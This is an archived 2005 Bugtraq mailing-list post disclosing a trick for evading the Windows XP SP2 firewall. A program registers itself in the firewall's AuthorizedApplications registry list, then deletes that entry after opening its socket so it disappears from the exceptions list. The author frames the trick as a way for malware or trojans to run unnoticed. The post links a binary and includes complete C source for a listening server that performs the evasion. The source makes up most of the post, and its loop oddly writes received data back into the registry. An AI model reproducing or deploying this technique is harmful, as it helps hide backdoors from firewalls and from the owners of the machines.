lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20050907203450.2196.qmail@securityfocus.com>
Date: 7 Sep 2005 20:34:50 -0000
From: crusoe@...xandria.cc
To: bugtraq@...urityfocus.com
Subject: anti Windows XP SP2 firewall trick


1.9.2005
Mark Kica 
crusoe@...xandria.cc
FEI AI Technical University Kosice   
#Dedicated to Katka H. from Levoca



     How to avoid of detection of server application on Windows XP SP2 firewall 

###############################################################################
#Q:How safe is Windows XP SP2 firewall ?
#A:Not very...

 This trick use only modification of registry keys.Windows Xp SP2 firewall have
list of allowed program in register which are not blocked.If you add new key
to it,your server (malware or trojane) can run freely.

also server can be invisible in following list  

start->control panel->windows firewall->exceptions


It will become invisible from this list because after you create socket,you can remove registry string value of your server and connection wont be aborted

Other way how to bypass SP2 firewall ,is to create trojan not as server,but
as client.

##################################################################

http://taekwondo-itf.szm.sk/bugg.zip

Test :

#c:\bugg.exe          Server running on port 2001

connect to server with :

#telnet localhost 2001



##################################################################

Our Registry path is

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List


and there you can create string value

Value name                    Value           

C:\chat.exe  ........ C:\chat.exe:*:Enabled:chat


NO SPACES!!! in key name etc.  _C:\chat.exe___

#################################################################
Tested on Windows XP 2005 center media edition with integrated SP2

Source code 
(server use ezsocket lib)

#include <stdio.h>
#include <windows.h>
#include <ezsocket.h>
#include <conio.h>
#include "Shlwapi.h"

int main( int argc, char *argv [] )
    {
    char buffer[1024];
    char filename[1024];

    HKEY hKey;
    int i;

    GetModuleFileName(NULL, filename, 1024);

    strcpy(buffer, filename);
    strcat(buffer, ":*:Enabled:");
    strcat(buffer, "bugg");

    RegOpenKeyEx(

       HKEY_LOCAL_MACHINE,
       "SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List",
       0,
       KEY_ALL_ACCESS,
       &hKey);

    RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
    
    int temp, sockfd, new_fd, fd_size;
    struct sockaddr_in remote_addr;

    fprintf(stdout, "Simple server example with Anti SP2 firewall trick    \n");
    fprintf(stdout, "             This is not trojan                       \n");
    fprintf(stdout, "             Opened port is :2001                      \n");
    fprintf(stdout, "author:Mark Kica student of Technical University Kosice\n");
    fprintf(stdout, "Dedicated to Katka H. from Levoca                       \n");


    sleep(3);

    if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
        return 0;
        

    for (; ; )
        {
        RegDeleteValue(hKey, filename);  
          fd_size = sizeof(struct sockaddr_in);

        if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
            {
            perror("accept");
            continue;
            }
        temp = send(new_fd, "Hello World\r\n", strlen("Hello World\r\n"), 0);
        fprintf(stdout, "Sended: Hello World\r\n");
        temp = recv(new_fd, buffer, 1024, 0);
        buffer[temp] = '\0';
        fprintf(stdout, "Recieved: %s\r\n", buffer);
        ezclose_socket(new_fd);
        RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

        if (!strcmp(buffer, "quit"))
            break;
        }


    ezsocket_exit();
   return 0;
    }
  


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ